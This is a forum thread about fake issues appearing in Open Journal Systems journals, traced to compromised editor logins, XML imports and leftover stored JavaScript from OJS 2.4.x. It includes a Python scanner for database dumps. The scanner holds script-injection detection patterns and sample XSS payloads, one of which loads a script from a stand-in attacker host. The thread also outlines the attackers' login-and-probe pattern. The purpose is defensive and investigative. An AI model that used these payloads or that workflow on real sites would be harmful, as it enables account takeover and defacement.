Publishing fake issues in third-party OJS (without hacking into OJS)

Today we received a request for help from a journal we host. They had published a fake issue in their OJS.

We noticed that there are many journals experiencing the same problem. Basically, an issue is published without articles, but with a DOI. Several issues can now be found through this search: Google Search

In the case we investigated, we identified that an attacker had logged in through the account of one of the editors and imported the fake issue from an XML. In other words, it wasn’t a vulnerability being exploited in OJS, but the use of third-party accounts, possibly with leaked or fragile passwords.

Hi @abadan,

Interesting, I hadn’t seen this before. I mentioned on another thread that we have seen reports of privilege escalations via old XSS attacks; have you looked at the journal you host to see if this might’ve been the vector? (Looking through a mysqldump of the database for <script might also give you something to investigate.)

Regards,
Alec Smecher
Public Knowledge Project Team

Complementing the general case with our findings:

We did not identify how they obtained the credentials of legitimate users, but we were able to identify a pattern of similar attempts in this and other journals:

  1. Log in with a regular journal user
  2. They try to access the XML import area
  3. If there is no permission and there is another compromised login in the same OJS, they restart the process.

Now, specifically about the case where they succeeded in publishing an issue, which I reported above: it is a journal that came from OJS 2.4.x, so there were more opportunities for exploitation until the upgrade took place. As of OJS 3.3.x we have not identified any vulnerabilities being exploited.

When we migrate an OJS to our hosting, we look for registered users who don’t look legitimate. In the case of this journal, at the time of the upgrade 4 users who had JS code in their biography or another field were deactivated.

In addition, today I found JS code in the abstract of a published article. OJS doesn’t display it and it seems to have been inserted back in the days of OJS 2.4.x.

Thanks for the suggestions, Alec.
We’ll let you know if we make any further progress.
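
As an added illustration of the two checks discussed in this thread (searching a mysqldump for `<script`, and finding users or abstracts carrying JS code), here is a small scanner; it is not code from the forum participants or from PKP. The `user_settings` and `publication_settings` table layouts are only assumed to resemble OJS 3.x, and the dump excerpt is constructed.

```python
"""Scan a mysqldump of an OJS database for script injection in user-supplied text fields.

Added example, not PKP code: table and column names are assumed to resemble an
OJS 3.x layout, and SAMPLE_DUMP is a constructed excerpt, not a real journal's data.
"""
import re

# Indicators of injected JavaScript: <script tags, common inline event handlers, javascript: URIs.
SUSPICIOUS = re.compile(
    r"<\s*script\b|\bon(?:error|load|click|mouse\w*|focus|blur|key\w*)\s*=|javascript\s*:", re.I
)
INSERT_RE = re.compile(r"^INSERT INTO `(\w+)` VALUES (.*);$")
# One (...) row: quoted literals (with backslash escapes) or anything that is not a paren/quote.
ROW_RE = re.compile(r"\(((?:'(?:[^'\\]|\\.)*'|[^()'])*)\)")
FIELD_RE = re.compile(r"'(?:[^'\\]|\\.)*'|[^,]+")


def scan_dump(dump_text):
    """Return (table, first_column, literal) for every row whose string literal looks injected."""
    hits = []
    for line in dump_text.splitlines():
        m = INSERT_RE.match(line)
        if not m:
            continue
        table, values = m.group(1), m.group(2)
        for row in ROW_RE.finditer(values):
            fields = FIELD_RE.findall(row.group(1))
            for field in fields[1:]:
                # Unescape \' so a payload split across quotes is still seen whole.
                if field.startswith("'") and SUSPICIOUS.search(field.replace("\\'", "'")):
                    hits.append((table, fields[0], field[1:-1]))
                    break
    return hits


# Constructed sample dump: two clean rows and two carrying injected markup.
SAMPLE_DUMP = r"""
INSERT INTO `user_settings` VALUES (7,'en_US','biography','Editor since 2015'),(12,'en_US','biography','<ScRiPt src=\'//evil.example/x.js\'></script>');
INSERT INTO `publication_settings` VALUES (301,'en_US','abstract','<p>A normal abstract.</p>'),(302,'en_US','abstract','<p>Hi<img src=x onerror=alert(1)></p>');
"""

if __name__ == "__main__":
    for table, row_id, snippet in scan_dump(SAMPLE_DUMP):
        print(f"{table} id={row_id}: {snippet[:60]}")
```

On a real dump, the first column of `user_settings` is the user id to deactivate and the first column of `publication_settings` identifies the publication whose abstract needs cleaning.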

Hi @abadan,

Hmm, I wonder if they aren’t working through some third party username/password database looking for shared credentials, attempting to log in to OJS with them, and when they can, POSTing an XML file to determine whether they’ve got a manager or admin account.

If you see anything more, please let me know (PM if it’s sensitive).

Thanks,
Alec Smecher
Public Knowledge Project Team